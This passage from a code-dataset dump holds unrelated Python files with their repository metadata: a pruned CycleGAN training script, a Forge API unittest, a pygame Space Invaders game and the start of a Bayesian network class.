mask_chns.append(first_conv_out*2) #2nd conv
mask_chns.append(first_conv_out*4) #3rd conv 1~9 res_block
mask_chns.append(first_conv_out*2) #1st trans_conv
mask_chns.append(first_conv_out) #2nd trans_conv
bit_len=0
for mask_chn in mask_chns:
bit_len+= mask_chn
def train_from_mask():
#load best fitness binary masks
mask_input_A2B=np.loadtxt("/cache/GA/txt/best_fitness_A2B.txt")
mask_input_B2A=np.loadtxt("/cache/GA/txt/best_fitness_B2A.txt")
cfg_mask_A2B=compute_layer_mask(mask_input_A2B,mask_chns)
cfg_mask_B2A=compute_layer_mask(mask_input_B2A,mask_chns)
netG_B2A = Generator(opt.output_nc, opt.input_nc)
netG_A2B = Generator(opt.output_nc, opt.input_nc)
model_A2B = Generator_Prune(cfg_mask_A2B)
model_B2A = Generator_Prune(cfg_mask_B2A)
netD_A = Discriminator(opt.input_nc)
netD_B = Discriminator(opt.output_nc)
netG_A2B.load_state_dict(torch.load('/cache/log/output/netG_A2B.pth'))
netG_B2A.load_state_dict(torch.load('/cache/log/output/netG_B2A.pth'))
netD_A.load_state_dict(torch.load('/cache/log/output/netD_A.pth'))
netD_B.load_state_dict(torch.load('/cache/log/output/netD_B.pth'))
# Lossess
criterion_GAN = torch.nn.MSELoss()
criterion_cycle = torch.nn.L1Loss()
criterion_identity = torch.nn.L1Loss()
layer_id_in_cfg=0
start_mask=torch.ones(3)
end_mask=cfg_mask_A2B[layer_id_in_cfg]
for [m0, m1] in zip(netG_A2B.modules(), model_A2B.modules()):
if isinstance(m0, nn.Conv2d):
idx0 = np.squeeze(np.argwhere(np.asarray(start_mask)))
idx1 = np.squeeze(np.argwhere(np.asarray(end_mask)))
print('In shape: {:d}, Out shape {:d}.'.format(idx0.size, idx1.size))
w1 = m0.weight.data[:, idx0.tolist(), :, :].clone()
w1 = w1[idx1.tolist(), :, :, :].clone()
m1.weight.data = w1.clone()
m1.bias.data =m0.bias.data[idx1.tolist()].clone()
layer_id_in_cfg += 1
start_mask = end_mask
if layer_id_in_cfg < len(cfg_mask_A2B): # do not change in Final FC
end_mask = cfg_mask_A2B[layer_id_in_cfg]
print(layer_id_in_cfg)
elif isinstance(m0, nn.ConvTranspose2d):
print('Into ConvTranspose...')
idx0 = np.squeeze(np.argwhere(np.asarray(start_mask)))
idx1 = np.squeeze(np.argwhere(np.asarray(end_mask)))
print('In shape: {:d}, Out shape {:d}.'.format(idx0.size, idx1.size))
w1 = m0.weight.data[idx0.tolist(),:, :, :].clone()
w1 = w1[:,idx1.tolist(), :, :].clone()
m1.weight.data = w1.clone()
m1.bias.data =m0.bias.data[idx1.tolist()].clone()
layer_id_in_cfg += 1
start_mask = end_mask
if layer_id_in_cfg < len(cfg_mask_A2B):
end_mask = cfg_mask_A2B[layer_id_in_cfg]
layer_id_in_cfg=0
start_mask=torch.ones(3)
end_mask=cfg_mask_B2A[layer_id_in_cfg]
for [m0, m1] in zip(netG_B2A.modules(), model_B2A.modules()):
if isinstance(m0, nn.Conv2d):
idx0 = np.squeeze(np.argwhere(np.asarray(start_mask)))
idx1 = np.squeeze(np.argwhere(np.asarray(end_mask)))
print('In shape: {:d}, Out shape {:d}.'.format(idx0.size, idx1.size))
w1 = m0.weight.data[:, idx0.tolist(), :, :].clone()
w1 = w1[idx1.tolist(), :, :, :].clone()
m1.weight.data = w1.clone()
m1.bias.data =m0.bias.data[idx1.tolist()].clone()
layer_id_in_cfg += 1
start_mask = end_mask
if layer_id_in_cfg < len(cfg_mask_B2A):
end_mask = cfg_mask_B2A[layer_id_in_cfg]
print(layer_id_in_cfg)
elif isinstance(m0, nn.ConvTranspose2d):
print('Into ConvTranspose...')
idx0 = np.squeeze(np.argwhere(np.asarray(start_mask)))
idx1 = np.squeeze(np.argwhere(np.asarray(end_mask)))
print('In shape: {:d}, Out shape {:d}.'.format(idx0.size, idx1.size))
w1 = m0.weight.data[idx0.tolist(),:, :, :].clone()
w1 = w1[:,idx1.tolist(), :, :].clone()
m1.weight.data = w1.clone()
m1.bias.data =m0.bias.data[idx1.tolist()].clone()
layer_id_in_cfg += 1
start_mask = end_mask
if layer_id_in_cfg < len(cfg_mask_B2A):
end_mask = cfg_mask_B2A[layer_id_in_cfg]
# Dataset loader
netD_A=torch.nn.DataParallel(netD_A).cuda()
netD_B=torch.nn.DataParallel(netD_B).cuda()
model_A2B=torch.nn.DataParallel(model_A2B).cuda()
model_B2A=torch.nn.DataParallel(model_B2A).cuda()
Tensor = torch.cuda.FloatTensor if opt.cuda else torch.Tensor
input_A = Tensor(opt.batchSize, opt.input_nc, opt.size, opt.size)
input_B = Tensor(opt.batchSize, opt.output_nc, opt.size, opt.size)
target_real = Variable(Tensor(opt.batchSize).fill_(1.0), requires_grad=False)
target_fake = Variable(Tensor(opt.batchSize).fill_(0.0), requires_grad=False)
fake_A_buffer = ReplayBuffer()
fake_B_buffer = ReplayBuffer()
lamda_loss_ID=5.0
lamda_loss_G=1.0
lamda_loss_cycle=10.0
optimizer_G = torch.optim.Adam(itertools.chain(model_A2B.parameters(), model_B2A.parameters()),
lr=opt.lr, betas=(0.5, 0.999))
optimizer_D_A = torch.optim.Adam(netD_A.parameters(), lr=opt.lr, betas=(0.5, 0.999))
optimizer_D_B = torch.optim.Adam(netD_B.parameters(), lr=opt.lr, betas=(0.5, 0.999))
lr_scheduler_G = torch.optim.lr_scheduler.LambdaLR(optimizer_G, lr_lambda=LambdaLR(opt.n_epochs, opt.epoch, opt.decay_epoch).step)
lr_scheduler_D_A = torch.optim.lr_scheduler.LambdaLR(optimizer_D_A, lr_lambda=LambdaLR(opt.n_epochs, opt.epoch, opt.decay_epoch).step)
lr_scheduler_D_B = torch.optim.lr_scheduler.LambdaLR(optimizer_D_B, lr_lambda=LambdaLR(opt.n_epochs, opt.epoch, opt.decay_epoch).step)
transforms_ = [
transforms.Resize(int(opt.size*1.12), Image.BICUBIC),
transforms.RandomCrop(opt.size),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.5,0.5,0.5), (0.5,0.5,0.5)) ]
dataloader = DataLoader(ImageDataset(opt.dataroot, transforms_=transforms_, unaligned=True,mode='train'), batch_size=opt.batchSize, shuffle=True,drop_last=True)
for epoch in range(opt.epoch, opt.n_epochs):
for i, batch in enumerate(dataloader):
# Set model input
real_A = Variable(input_A.copy_(batch['A']))
real_B = Variable(input_B.copy_(batch['B']))
###### Generators A2B and B2A ######
optimizer_G.zero_grad()
# Identity loss
# G_A2B(B) should equal B if real B is fed
same_B = model_A2B(real_B)
loss_identity_B = criterion_identity(same_B, real_B)*lamda_loss_ID #initial 5.0
# G_B2A(A) should equal A if real A is fed
same_A = model_B2A(real_A)
loss_identity_A = criterion_identity(same_A, real_A)*lamda_loss_ID #initial 5.0
# GAN loss
fake_B = model_A2B(real_A)
pred_fake = netD_B(fake_B)
loss_GAN_A2B = criterion_GAN(pred_fake, target_real)*lamda_loss_G #initial 1.0
fake_A = model_B2A(real_B)
pred_fake = netD_A(fake_A)
loss_GAN_B2A = criterion_GAN(pred_fake, target_real)*lamda_loss_G #initial 1.0
# Cycle loss
recovered_A = model_B2A(fake_B)
loss_cycle_ABA = criterion_cycle(recovered_A, real_A)*lamda_loss_cycle #initial 10.0
recovered_B = model_A2B(fake_A)
loss_cycle_BAB = criterion_cycle(recovered_B, real_B)*lamda_loss_cycle #initial 10.0
# Total loss
loss_G = loss_identity_A + loss_identity_B + loss_GAN_A2B + loss_GAN_B2A + loss_cycle_ABA + loss_cycle_BAB
loss_G.backward()
optimizer_G.step()
###### Discriminator A ######
optimizer_D_A.zero_grad()
# Real loss
pred_real = netD_A(real_A)
loss_D_real = criterion_GAN(pred_real, target_real)
# Fake loss
fake_A = fake_A_buffer.push_and_pop(fake_A)
pred_fake = netD_A(fake_A.detach())
loss_D_fake = criterion_GAN(pred_fake, target_fake)
# Total loss
loss_D_A = (loss_D_real + loss_D_fake)*0.5
loss_D_A.backward()
optimizer_D_A.step()
###################################
###### Discriminator B ######
optimizer_D_B.zero_grad()
# Real loss
pred_real = netD_B(real_B)
loss_D_real = criterion_GAN(pred_real, target_real)
# Fake loss
fake_B = fake_B_buffer.push_and_pop(fake_B)
pred_fake = netD_B(fake_B.detach())
loss_D_fake = criterion_GAN(pred_fake, target_fake)
# Total loss
loss_D_B = (loss_D_real + loss_D_fake)*0.5
loss_D_B.backward()
optimizer_D_B.step()
print("epoch:%d Loss G:%4f LossID_A:%4f LossID_B:%4f Loss_G_A2B:%4f Loss_G_B2A:%4f Loss_Cycle_ABA:%4f Loss_Cycle_BAB:%4f "%(epoch,loss_G,loss_identity_A, loss_identity_B, loss_GAN_A2B, loss_GAN_B2A, loss_cycle_ABA, loss_cycle_BAB))
# Update learning rates
lr_scheduler_G.step()
lr_scheduler_D_A.step()
lr_scheduler_D_B.step()
if epoch%20==0:
# Save models checkpoints
torch.save(model_A2B.module.state_dict(), '/cache/log/output/A2B_%d.pth'%(epoch))
torch.save(model_B2A.module.state_dict(), '/cache/log/output/B2A_%d.pth'%(epoch))
###################################
if __name__ == "__main__":
train_from_mask()
| 39.169753 | 245 | 0.639902 | 1,823 | 12,691 | 4.179375 | 0.150302 | 0.016538 | 0.021263 | 0.02835 | 0.505184 | 0.463184 | 0.419084 | 0.370259 | 0.370259 | 0.332721 | 0 | 0.026165 | 0.232054 | 12,691 | 324 | 246 | 39.169753 | 0.755592 | 0.046805 | 0 | 0.330097 | 0 | 0.004854 | 0.110535 | 0.02893 | 0 | 0 | 0 | 0 | 0 | 1 | 0.004854 | false | 0 | 0.092233 | 0 | 0.097087 | 0.048544 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2ac384bcee15e4f087beaa4add6c2d785179245 | 505 | py | Python | test.py | dmh126/forge-python-data-management-api | 9c33f220021251a0340346065e3dd1998fc49a12 | [
"MIT"
] | 1 | 2019-07-02T08:32:22.000Z | 2019-07-02T08:32:22.000Z | test.py | dmh126/forge-python-data-management-api | 9c33f220021251a0340346065e3dd1998fc49a12 | [
"MIT"
] | null | null | null | test.py | dmh126/forge-python-data-management-api | 9c33f220021251a0340346065e3dd1998fc49a12 | [
"MIT"
] | 2 | 2019-07-04T05:13:42.000Z | 2020-05-09T22:15:05.000Z | import os
import unittest
from forge_api_client import ApiClient
class Tests(unittest.TestCase):
def setUp(self):
self.client_id = os.environ["FORGE_CLIENT_ID"]
self.client_secret = os.environ["FORGE_CLIENT_SECRET"]
def test_buckets(self):
fac = ApiClient()
fac.authClientTwoLegged(self.client_id, self.client_secret, scope="bucket:read")
buckets = fac.getBuckets()
self.assertIn("items", buckets)
if __name__ == '__main__':
unittest.main()
| 26.578947 | 88 | 0.691089 | 62 | 505 | 5.322581 | 0.483871 | 0.121212 | 0.072727 | 0.121212 | 0.145455 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.19802 | 505 | 18 | 89 | 28.055556 | 0.814815 | 0 | 0 | 0 | 0 | 0 | 0.114851 | 0 | 0 | 0 | 0 | 0 | 0.071429 | 1 | 0.142857 | false | 0 | 0.214286 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2ac5dd79237ed4091ea9c293d63cecb486e627a | 22,039 | py | Python | spaceinvaders.py | hi-hi-ray/space-invaders | 8df3bc2b8bf2093d26486dfd17f9acc2caaa0ceb | [
"MIT"
] | 2 | 2018-09-26T14:33:00.000Z | 2019-10-10T21:53:04.000Z | spaceinvaders.py | hi-hi-ray/space-invaders | 8df3bc2b8bf2093d26486dfd17f9acc2caaa0ceb | [
"MIT"
] | null | null | null | spaceinvaders.py | hi-hi-ray/space-invaders | 8df3bc2b8bf2093d26486dfd17f9acc2caaa0ceb | [
"MIT"
] | null | null | null | # Space Invaders
# Created by Lee Robinson
# Adapted by Raysa Dutra
# !/usr/bin/env python
from pygame import *
import pygame.draw
from nave import Ship
from tiro import Bullet
from inimigo import Enemy
from barreira import Blocker
from ufo import Mystery
from explosao import Explosion
from vida import Life
from texto import Text
import sys
from random import shuffle, choice
import numpy as np
import peewee
from pontos_orm import ScoreOrm
from estados_orm import StateOrm
from estados import State
from pontos import Score
# RGB Constants
WHITE = (255, 255, 255)
GREEN = (153, 255, 187)
YELLOW = (241, 255, 0)
BLUE = (80, 255, 239)
PURPLE = (203, 0, 255)
RED = (237, 28, 36)
SCREEN = display.set_mode((800, 600))
FONT = "fonts/space_invaders.ttf"
IMG_NAMES = ["ship", "ship", "mystery", "enemy1_1", "enemy1_2", "enemy2_1", "enemy2_2",
"enemy3_1", "enemy3_2", "explosionblue", "explosiongreen", "explosionpurple", "laser", "enemylaser"]
IMAGE = {name: image.load("images/{}.png".format(name)).convert_alpha() for name in IMG_NAMES}
class SpaceInvaders(object):
def __init__(self):
mixer.pre_init(44100, -16, 1, 512)
init()
self.caption = display.set_caption('Space Invaders')
self.screen = SCREEN
self.background = image.load('images/background.jpg').convert()
self.startGame = False
self.mainScreen = True
self.gameOver = False
self.scoreBoard = False
# Initial value for a new game
self.enemyPositionDefault = 65
# Counter for enemy starting position (increased each new round)
self.enemyPositionStart = self.enemyPositionDefault
# Current enemy starting position
self.enemyPosition = self.enemyPositionStart
def reset(self, score, lives, newGame=False):
self.player = Ship(IMAGE, game)
self.playerGroup = sprite.Group(self.player)
self.explosionsGroup = sprite.Group()
self.bullets = sprite.Group()
self.mysteryShip = Mystery(IMAGE, game)
self.mysteryGroup = sprite.Group(self.mysteryShip)
self.enemyBullets = sprite.Group()
self.reset_lives(lives)
self.enemyPosition = self.enemyPositionStart
self.make_enemies()
# Only create blockers on a new game, not a new round
if newGame:
self.allBlockers = sprite.Group(self.make_blockers(0), self.make_blockers(1), self.make_blockers(2),
self.make_blockers(3))
self.keys = key.get_pressed()
self.clock = time.Clock()
self.timer = time.get_ticks()
self.noteTimer = time.get_ticks()
self.shipTimer = time.get_ticks()
self.score = score
self.lives = lives
self.create_audio()
self.create_text()
self.killedRow = -1
self.killedColumn = -1
self.makeNewShip = False
self.shipAlive = True
self.killedArray = [[0] * 10 for x in range(5)]
def make_blockers(self, number):
blockerGroup = sprite.Group()
for row in range(4):
for column in range(9):
blocker = Blocker(10, GREEN, row, column, game)
blocker.rect.x = 50 + (200 * number) + (column * blocker.width)
blocker.rect.y = 450 + (row * blocker.height)
blockerGroup.add(blocker)
return blockerGroup
def reset_lives_sprites(self):
self.life1 = Life(657, 3, IMAGE, game)
self.life2 = Life(685, 3, IMAGE, game)
self.life3 = Life(713, 3, IMAGE, game)
self.life4 = Life(741, 3, IMAGE, game)
self.life5 = Life(769, 3, IMAGE, game)
if self.lives == 5:
self.livesGroup = sprite.Group(self.life1, self.life2, self.life3, self.life4, self.life5)
elif self.lives == 4:
self.livesGroup = sprite.Group(self.life1, self.life2, self.life3, self.life4)
elif self.lives == 3:
self.livesGroup = sprite.Group(self.life1, self.life2, self.life3)
elif self.lives == 2:
self.livesGroup = sprite.Group(self.life1, self.life2)
elif self.lives == 1:
self.livesGroup = sprite.Group(self.life1)
def reset_lives(self, lives):
self.lives = lives
self.reset_lives_sprites()
def create_audio(self):
self.sounds = {}
for sound_name in ["shoot", "shoot2", "invaderkilled", "mysterykilled", "shipexplosion"]:
self.sounds[sound_name] = mixer.Sound("sounds/{}.wav".format(sound_name))
self.sounds[sound_name].set_volume(0.2)
self.musicNotes = [mixer.Sound("sounds/{}.wav".format(i)) for i in range(4)]
for sound in self.musicNotes:
sound.set_volume(0.5)
self.noteIndex = 0
def play_main_music(self, currentTime):
moveTime = self.enemies.sprites()[0].moveTime
if currentTime - self.noteTimer > moveTime:
self.note = self.musicNotes[self.noteIndex]
if self.noteIndex < 3:
self.noteIndex += 1
else:
self.noteIndex = 0
self.note.play()
self.noteTimer += moveTime
def background_stars(self, game):
# The background stars:
# Set the position:
self.stars_x = np.random.rand(5) * 800
self.stars_y = np.random.rand(5) * 600
# Set the velocity:
self.stars_v = np.zeros(5)
for i in np.arange(5):
self.stars_v[i] = int(0.5 + np.random.uniform() * 0.1)
game.stars_y = (game.stars_y + game.stars_v * 0.2) % 600
for i in range(5):
game.stars_x[i] = game.stars_x[i] if not game.stars_v[i] else \
game.stars_x[i] + 0.1 * int((np.random.rand() - 0.5) * 2.1)
pygame.draw.aaline(game.screen, WHITE,
(int(game.stars_x[i]), int(game.stars_y[i])),
(int(game.stars_x[i]), int(game.stars_y[i])))
def create_text(self):
self.titleText = Text(FONT, 50, "Space Invaders", WHITE, 164, 155)
self.titleText2 = Text(FONT, 25, "Press any key to continue ...", WHITE, 201, 225)
self.gameOverText = Text(FONT, 50, "Game Over! ", WHITE, 250, 270)
self.nextRoundText = Text(FONT, 50, "Next Round! ", WHITE, 240, 270)
self.enemy1Text = Text(FONT, 25, " = 10 pts", GREEN, 368, 270)
self.enemy2Text = Text(FONT, 25, " = 20 pts", BLUE, 368, 320)
self.enemy3Text = Text(FONT, 25, " = 30 pts", PURPLE, 368, 370)
self.enemy4Text = Text(FONT, 25, " = ?????", RED, 368, 420)
self.scoreText = Text(FONT, 20, "Score:", WHITE, 4, 5)
self.livesText = Text(FONT, 20, "Lives: ", WHITE, 580, 5)
self.leaderboardText = Text(FONT, 50, "Scoreboard: ", WHITE, 150, 100)
def check_input(self):
self.keys = key.get_pressed()
for e in event.get():
if e.type == QUIT:
sys.exit()
if e.type == KEYDOWN:
if e.key == K_SPACE:
if len(self.bullets) == 0 and self.shipAlive:
if self.score < 1000:
bullet = Bullet(self.player.rect.x + 23, self.player.rect.y + 5, -1, 15, "laser", "center",
game, IMAGE)
self.bullets.add(bullet)
self.allSprites.add(self.bullets)
self.sounds["shoot"].play()
else:
leftbullet = Bullet(self.player.rect.x + 8, self.player.rect.y + 5, -1, 15, "laser", "left",
game, IMAGE)
rightbullet = Bullet(self.player.rect.x + 38, self.player.rect.y + 5, -1, 15, "laser",
"right", game, IMAGE)
self.bullets.add(leftbullet)
self.bullets.add(rightbullet)
self.allSprites.add(self.bullets)
self.sounds["shoot2"].play()
def make_enemies(self):
enemies = sprite.Group()
for row in range(5):
for column in range(10):
enemy = Enemy(row, column, IMAGE, game)
enemy.rect.x = 157 + (column * 50)
enemy.rect.y = self.enemyPosition + (row * 45)
enemies.add(enemy)
self.enemies = enemies
self.allSprites = sprite.Group(self.player, self.enemies, self.livesGroup, self.mysteryShip)
def make_enemies_shoot(self):
columnList = []
for enemy in self.enemies:
columnList.append(enemy.column)
columnSet = set(columnList)
columnList = list(columnSet)
shuffle(columnList)
column = columnList[0]
enemyList = []
rowList = []
for enemy in self.enemies:
if enemy.column == column:
rowList.append(enemy.row)
row = max(rowList)
for enemy in self.enemies:
if enemy.column == column and enemy.row == row:
if (time.get_ticks() - self.timer) > 700:
self.enemyBullets.add(
Bullet(enemy.rect.x + 14, enemy.rect.y + 20, 1, 5, "enemylaser", "center", game, IMAGE))
self.allSprites.add(self.enemyBullets)
self.timer = time.get_ticks()
def calculate_score(self, row):
scores = {0: 30,
1: 20,
2: 20,
3: 10,
4: 10,
5: choice([50, 100, 150, 300])
}
score = scores[row]
self.score += score
return score
def create_main_menu(self):
self.enemy1 = IMAGE["enemy3_1"]
self.enemy1 = transform.scale(self.enemy1, (40, 40))
self.enemy2 = IMAGE["enemy2_2"]
self.enemy2 = transform.scale(self.enemy2, (40, 40))
self.enemy3 = IMAGE["enemy1_2"]
self.enemy3 = transform.scale(self.enemy3, (40, 40))
self.enemy4 = IMAGE["mystery"]
self.enemy4 = transform.scale(self.enemy4, (80, 40))
self.screen.blit(self.enemy1, (318, 270))
self.screen.blit(self.enemy2, (318, 320))
self.screen.blit(self.enemy3, (318, 370))
self.screen.blit(self.enemy4, (299, 420))
for e in event.get():
if e.type == QUIT:
sys.exit()
if e.type == KEYUP:
self.startGame = True
self.mainScreen = False
def update_enemy_speed(self):
if len(self.enemies) <= 10:
for enemy in self.enemies:
enemy.moveTime = 400
if len(self.enemies) == 5:
for enemy in self.enemies:
enemy.moveTime = 200
def check_collisions(self):
collidedict = sprite.groupcollide(self.bullets, self.enemyBullets, True, False)
if collidedict:
for value in collidedict.values():
for currentSprite in value:
self.enemyBullets.remove(currentSprite)
self.allSprites.remove(currentSprite)
enemiesdict = sprite.groupcollide(self.bullets, self.enemies, True, False)
if enemiesdict:
for value in enemiesdict.values():
for currentSprite in value:
self.sounds["invaderkilled"].play()
player_state = State()
player_state.save_state(self.player.rect.x, self.lives, "invader")
self.killedRow = currentSprite.row
self.killedColumn = currentSprite.column
score = self.calculate_score(currentSprite.row)
explosion = Explosion(currentSprite.rect.x, currentSprite.rect.y, currentSprite.row, False, False,
score, FONT, WHITE, IMAGE, game)
self.explosionsGroup.add(explosion)
self.allSprites.remove(currentSprite)
self.enemies.remove(currentSprite)
self.gameTimer = time.get_ticks()
break
mysterydict = sprite.groupcollide(self.bullets, self.mysteryGroup, True, True)
if mysterydict:
for value in mysterydict.values():
for currentSprite in value:
currentSprite.mysteryEntered.stop()
self.sounds["mysterykilled"].play()
player_state = State()
player_state.save_state(self.player.rect.x, self.lives, "mystery")
score = self.calculate_score(currentSprite.row)
explosion = Explosion(currentSprite.rect.x, currentSprite.rect.y, currentSprite.row, False, True,
score, FONT, WHITE, IMAGE, game)
self.explosionsGroup.add(explosion)
self.allSprites.remove(currentSprite)
self.mysteryGroup.remove(currentSprite)
newShip = Mystery(IMAGE, game)
self.allSprites.add(newShip)
self.mysteryGroup.add(newShip)
break
bulletsdict = sprite.groupcollide(self.enemyBullets, self.playerGroup, True, False)
if bulletsdict:
for value in bulletsdict.values():
for playerShip in value:
if self.lives == 5:
self.lives -= 1
self.livesGroup.remove(self.life5)
self.allSprites.remove(self.life5)
elif self.lives == 4:
self.lives -= 1
self.livesGroup.remove(self.life4)
self.allSprites.remove(self.life4)
elif self.lives == 3:
self.lives -= 1
self.livesGroup.remove(self.life3)
self.allSprites.remove(self.life3)
elif self.lives == 2:
self.lives -= 1
self.livesGroup.remove(self.life2)
self.allSprites.remove(self.life2)
elif self.lives == 1:
self.lives -= 1
self.livesGroup.remove(self.life1)
self.allSprites.remove(self.life1)
elif self.lives == 0:
self.gameOver = True
self.startGame = False
self.sounds["shipexplosion"].play()
explosion = Explosion(playerShip.rect.x, playerShip.rect.y, 0, True, False, 0,
FONT, WHITE, IMAGE, game)
self.explosionsGroup.add(explosion)
self.allSprites.remove(playerShip)
self.playerGroup.remove(playerShip)
self.makeNewShip = True
self.shipTimer = time.get_ticks()
self.shipAlive = False
if sprite.groupcollide(self.enemies, self.playerGroup, True, True):
self.gameOver = True
self.startGame = False
sprite.groupcollide(self.bullets, self.allBlockers, True, True)
sprite.groupcollide(self.enemyBullets, self.allBlockers, True, True)
sprite.groupcollide(self.enemies, self.allBlockers, False, True)
def create_new_ship(self, createShip, currentTime):
if createShip and (currentTime - self.shipTimer > 900):
self.player = Ship(IMAGE, game)
self.allSprites.add(self.player)
self.playerGroup.add(self.player)
self.makeNewShip = False
self.shipAlive = True
def create_game_over(self, current_time):
self.screen.blit(self.background, (0, 0))
self.background_stars(game)
if current_time - self.timer < 750:
self.gameOverText.draw(self.screen)
if current_time - self.timer > 750 and current_time - self.timer < 1500:
self.screen.blit(self.background, (0, 0))
if current_time - self.timer > 1500 and current_time - self.timer < 2250:
self.gameOverText.draw(self.screen)
if current_time - self.timer > 2250 and current_time - self.timer < 2750:
self.screen.blit(self.background, (0, 0))
if current_time - self.timer > 3000:
scoreboard = Score()
scoreboard.save_score(self.score)
self.startGame = False
self.gameOver = False
self.mainScreen = False
self.scoreBoard = True
for e in event.get():
if e.type == QUIT:
sys.exit()
def create_scoreboard(self, scores):
self.screen.blit(self.background, (0, 0))
self.background_stars(game)
self.scoreboardText = Text(FONT, 20, "1- " + str(scores[0]), WHITE, 235, 201)
self.scoreboardText2 = Text(FONT, 20, "2- " + str(scores[1]), WHITE, 235, 221)
self.scoreboardText3 = Text(FONT, 20, "3- " + str(scores[2]), WHITE, 235, 241)
self.scoreboardText4 = Text(FONT, 20, "4- " + str(scores[3]), WHITE, 235, 261)
self.scoreboardText5 = Text(FONT, 20, "5- " + str(scores[4]), WHITE, 235, 281)
self.scoreboardText6 = Text(FONT, 20, "6- " + str(scores[5]), WHITE, 435, 201)
self.scoreboardText7 = Text(FONT, 20, "7- " + str(scores[6]), WHITE, 435, 221)
self.scoreboardText8 = Text(FONT, 20, "8- " + str(scores[7]), WHITE, 435, 241)
self.scoreboardText9 = Text(FONT, 20, "9- " + str(scores[8]), WHITE, 435, 261)
self.scoreboardText10 = Text(FONT, 20, "10- " + str(scores[9]), WHITE, 435, 281)
self.leaderboardText.draw(self.screen)
self.scoreboardText.draw(self.screen)
self.scoreboardText2.draw(self.screen)
self.scoreboardText3.draw(self.screen)
self.scoreboardText4.draw(self.screen)
self.scoreboardText5.draw(self.screen)
self.scoreboardText6.draw(self.screen)
self.scoreboardText7.draw(self.screen)
self.scoreboardText8.draw(self.screen)
self.scoreboardText9.draw(self.screen)
self.scoreboardText10.draw(self.screen)
for e in event.get():
if e.type == QUIT:
sys.exit()
if e.type == KEYUP:
self.startGame = False
self.gameOver = False
self.scoreBoard = False
self.mainScreen = True
def main(self):
while True:
if self.mainScreen:
self.reset(0, 5, True)
self.screen.blit(self.background, (0, 0))
self.background_stars(game)
self.titleText.draw(self.screen)
self.titleText2.draw(self.screen)
self.enemy1Text.draw(self.screen)
self.enemy2Text.draw(self.screen)
self.enemy3Text.draw(self.screen)
self.enemy4Text.draw(self.screen)
self.create_main_menu()
elif self.startGame:
if len(self.enemies) == 0:
current_time = time.get_ticks()
if current_time - self.gameTimer < 3000:
self.screen.blit(self.background, (0, 0))
self.background_stars(game)
self.scoreText2 = Text(FONT, 20, str(self.score), GREEN, 85, 5)
self.scoreText.draw(self.screen)
self.scoreText2.draw(self.screen)
self.nextRoundText.draw(self.screen)
self.livesText.draw(self.screen)
self.livesGroup.update(self.keys)
self.check_input()
if current_time - self.gameTimer > 3000:
# Move enemies closer to bottom
self.enemyPositionStart += 35
self.reset(self.score, self.lives)
self.make_enemies()
self.gameTimer += 3000
else:
current_time = time.get_ticks()
self.play_main_music(current_time)
self.screen.blit(self.background, (0, 0))
self.background_stars(game)
self.allBlockers.update(self.screen)
self.scoreText2 = Text(FONT, 20, str(self.score), GREEN, 85, 5)
self.scoreText.draw(self.screen)
self.scoreText2.draw(self.screen)
self.livesText.draw(self.screen)
self.check_input()
self.allSprites.update(self.keys, current_time, self.killedRow, self.killedColumn, self.killedArray)
self.explosionsGroup.update(self.keys, current_time)
self.check_collisions()
self.create_new_ship(self.makeNewShip, current_time)
self.update_enemy_speed()
if len(self.enemies) > 0:
self.make_enemies_shoot()
elif self.gameOver:
current_time = time.get_ticks()
# Reset enemy starting position
self.enemyPositionStart = self.enemyPositionDefault
self.create_game_over(current_time)
elif self.scoreBoard:
scoreboard = Score()
self.scores = scoreboard.order_scores()
self.create_scoreboard(self.scores)
display.update()
self.clock.tick(60)
if __name__ == '__main__':
try:
ScoreOrm.create_table()
StateOrm.create_table()
except peewee.OperationalError:
print('Tabela ja existe!')
game = SpaceInvaders()
game.main()
| 43.298625 | 120 | 0.549163 | 2,413 | 22,039 | 4.95317 | 0.155823 | 0.032631 | 0.030455 | 0.034639 | 0.341867 | 0.271168 | 0.221386 | 0.168675 | 0.159053 | 0.153029 | 0 | 0.04461 | 0.342938 | 22,039 | 508 | 121 | 43.383858 | 0.780747 | 0.017696 | 0 | 0.280899 | 0 | 0 | 0.027873 | 0.00208 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044944 | false | 0 | 0.040449 | 0 | 0.092135 | 0.002247 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2acb51e0b9aa7da38f2ee50711be597674bf764 | 8,528 | py | Python | bayesian_net.py | lliryc/baytrino | 272bd17b7a7c9fb027e976adb7278ec5b582d36c | [
"Apache-2.0"
] | 6 | 2021-01-29T12:13:51.000Z | 2022-01-28T18:02:38.000Z | bayesian_net.py | lliryc/baytrino | 272bd17b7a7c9fb027e976adb7278ec5b582d36c | [
"Apache-2.0"
] | null | null | null | bayesian_net.py | lliryc/baytrino | 272bd17b7a7c9fb027e976adb7278ec5b582d36c | [
"Apache-2.0"
] | null | null | null | import numpy as np
import typing as t
from value_vector import ValueVector
from conditional_distribution import ProbRelation
import functools
import random
from pgmpy.models import BayesianModel
from pgmpy.factors.discrete import TabularCPD, DiscreteFactor
from pgmpy.inference import VariableElimination, Inference
from pgmpy.sampling import BayesianModelSampling
import time
import pgmpy
#import dask
#import dask.array as da
#dask.config.set(scheduler='threads')
class BayesianNet:
def __init__(self):
self.nodes = {}
self.edges = {}
self.edges_inv = {}
self.var_cache = {}
self.factor_cache = {}
def add_node(self, name:str, distr:t.List[float]):
if str is self.nodes:
raise Exception(f"Node with name '{name}' already exists")
self.nodes[name] = ValueVector(distr)
self.edges[name] = {}
